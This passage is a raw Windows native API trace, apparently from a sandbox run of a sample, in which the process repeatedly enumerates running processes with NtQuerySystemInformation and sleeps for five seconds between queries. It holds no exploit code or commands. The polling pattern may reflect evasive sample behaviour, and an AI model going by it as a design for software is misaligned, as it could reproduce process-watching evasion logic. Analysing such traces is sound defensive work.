ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.274] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.281] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.304] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.416] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.424] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 